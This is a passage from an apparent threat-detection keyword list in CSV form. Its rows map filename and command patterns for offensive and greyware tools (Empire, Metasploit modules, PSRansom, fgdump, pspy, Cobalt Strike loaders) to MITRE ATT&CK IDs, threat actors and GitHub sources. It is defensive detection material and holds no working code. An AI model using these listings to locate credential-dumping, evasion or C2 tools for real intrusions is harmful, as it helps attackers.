- T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/AggressiveProxy,1,1,N/A,10,10,139,26,2020-11-04T16:08:11Z,2020-11-04T12:53:00Z -*proxyshell-enumerate.py*,offensive_tool_keyword,Earth Lusca Operations Tools ,Earth Lusca Operations Tools and commands,T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc,1,1,N/A,N/A,,N/A,,, -*proxyshell-poc*,offensive_tool_keyword,Earth Lusca Operations Tools ,Earth Lusca Operations Tools and commands,T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc,1,1,N/A,N/A,,N/A,,, -*ps_token2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*ps_wmi_exec.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ps2exe -*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,0,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*ps2exe *.ps1*.exe*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,0,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*ps2exe.ps1*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,1,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*ps2exe.psd1*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,1,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*ps2exe.psm1*,offensive_tool_keyword,PS2EXE,Module to compile 
powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,1,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*PS2EXE-master*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,1,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*PSAmsiClient.ps1*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*PSAmsiScanner.ps1*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*PSAttack*,offensive_tool_keyword,PSAttack,PS>Attack combines some of the best projects in the infosec powershell community into a self contained custom PowerShell console. Its designed to make it easy to use PowerShell offensively and to evade antivirus and Incident Response teams. 
It does this with in a couple of ways.,T1059 - T1112 - T1055 - T1566,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/jaredhaight/PSAttack,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PSBits*NetShRun*,greyware_tool_keyword,NetshRun,Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want,T1546.008 - T1112 - T1037 - T1055 - T1218.001,TA0003 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/gtworek/PSBits/blob/master/NetShRun,1,1,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*PSByPassCLM*,offensive_tool_keyword,PSByPassCLM,Bypass for PowerShell Constrained Language Mode,T1027 - T1059 - T1218 - T1086 - T1089,TA0002 - TA0008 - TA0007,N/A,N/A,Defense Evasion,https://github.com/padovah4ck/PSByPassCLM,1,0,N/A,N/A,3,280,45,2021-12-23T16:29:01Z,2018-09-13T07:27:18Z -*psc4re/NSE-scripts*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*PSconfusion.py*,offensive_tool_keyword,cobaltstrike,CS anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*pse2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*ps-empire client*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*ps-empire server*,offensive_tool_keyword,empire,Empire is a post-exploitation 
and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*ps-empire*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 
- T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*psexec.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*PsExec[1].exe*,greyware_tool_keyword,psexec,Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. or the execution of malicious payloads.,T1047 - T1105 - T1204,TA0003 - TA0008 - TA0040,N/A,N/A,Lateral movement,https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*psexec_ms17_010.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*PSEXEC_PSH *,offensive_tool_keyword,cobaltstrike,Bloodhound Attack Path Automation in CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/vysecurity/ANGRYPUPPY,1,0,N/A,10,10,300,93,2020-04-26T17:35:31Z,2017-07-11T14:18:07Z -*PsExec64*,greyware_tool_keyword,psexec,Adversaries may place the PsExec executable in 
the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. or the execution of malicious payloads.,T1047 - T1105 - T1204,TA0003 - TA0008 - TA0040,N/A,N/A,Lateral movement,https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*-PsExecCmd*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-PsExec.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*PsExecLiveImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*PsExecMenu(*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*PSEXECSVC*,greyware_tool_keyword,psexec,PsExec is a legitimate Microsoft tool for remote administration. However. attackers can misuse it to execute malicious commands or software on other network machines. install persistent threats. and evade some security systems. ,T1047 - T1105 - T1204,TA0003 - TA0008 - TA0040,N/A,N/A,Lateral movement,https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*PShlSpy*,signature_keyword,Antivirus Signature,highly revelant Antivirus signature. 
phishing tools,N/A,N/A,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*psinject * x64 Invoke-*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*psinject -PID*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*pslo *.ps1*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*PsLoggedon.exe*,greyware_tool_keyword,psloggedon,PsLoggedOn is an applet that displays 
both the locally logged on users and users logged on via resources for either the local computer. or a remote one,T1003 - T1049 - T1057 - T1082 - T1087 - T1518,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Reconnaissance,https://learn.microsoft.com/en-us/sysinternals/downloads/psloggedon,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*PsLoggedon64.exe*,greyware_tool_keyword,psloggedon,PsLoggedOn is an applet that displays both the locally logged on users and users logged on via resources for either the local computer. or a remote one,T1003 - T1049 - T1057 - T1082 - T1087 - T1518,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Reconnaissance,https://learn.microsoft.com/en-us/sysinternals/downloads/psloggedon,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*pSNIRFgTuZnCdHN*,offensive_tool_keyword,trevorc2,Command and Control via Legitimate Behavior over HTTP,T1105 - T1071 - T1070,TA0011,N/A,N/A,C2,https://github.com/trustedsec/trevorc2,1,0,N/A,10,10,1100,244,2022-01-31T20:16:24Z,2017-10-27T15:59:28Z -*PSObfucate.py*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*Pspersist-main*,offensive_tool_keyword,Pspersist,Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.,T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001,TA0005 ,N/A,N/A,Persistence,https://github.com/TheD1rkMtr/Pspersist,1,1,N/A,10,1,72,17,2023-08-02T02:27:29Z,2023-02-01T17:21:38Z -*PSprofile.cpp*,offensive_tool_keyword,Pspersist,Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created 
the implant will executed too.,T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001,TA0005 ,N/A,N/A,Persistence,https://github.com/TheD1rkMtr/Pspersist,1,0,N/A,10,1,72,17,2023-08-02T02:27:29Z,2023-02-01T17:21:38Z -*pspy*psscanner,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*pspy32 -*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*pspy64 -*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*pspy-build:latest*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*pspy-development:latest*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*pspy-example:latest*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*pspy-master*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - 
TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,1,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*pspy-testing:latest*,offensive_tool_keyword,pspy,Monitor linux processes without root permissions,T1057 - T1514 - T1082,TA0007 - TA0009 - TA0003,N/A,N/A,Discovery,https://github.com/DominicBreuker/pspy,1,0,N/A,6,10,4029,449,2023-01-17T21:09:22Z,2018-02-08T21:41:37Z -*PSRansom.ps1*,offensive_tool_keyword,PSRansom,PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.,T1486 - T1107 - T1566.001,TA0011 - TA0010,N/A,N/A,Ransomware,https://github.com/JoelGMSec/PSRansom,1,1,N/A,N/A,4,371,95,2022-09-29T09:54:34Z,2022-02-27T11:52:03Z -*PSRecon*,offensive_tool_keyword,PSRecon,PSRecon gathers data from a remote Windows host using PowerShell (v2 or later). organizes the data into folders. hashes all extracted data. hashes PowerShell and various system properties. and sends the data off to the security team. The data can be pushed to a share. sent over email. 
or retained locally.,T1059 - T1003 - T1556 - T1204,TA0002 - TA0009,N/A,N/A,Information Gathering,https://github.com/gfoss/PSRecon,1,1,N/A,N/A,5,465,111,2017-07-29T15:03:04Z,2015-08-03T05:43:38Z -*psreflect *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*pstgdump.exe*,offensive_tool_keyword,fgdump,A utility for dumping passwords on Windows NT/2000/XP/2003 machines,T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001,TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008,N/A,Volt Typhoon,Credential Access,https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*pstree.ps1*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*PSWtool*,signature_keyword,Antivirus Signature,highly revelant Antivirus signature. Programs classified as PSWTool can be used to view or restore forgotten often hidden passwords. They can also be used with malicious intent. 
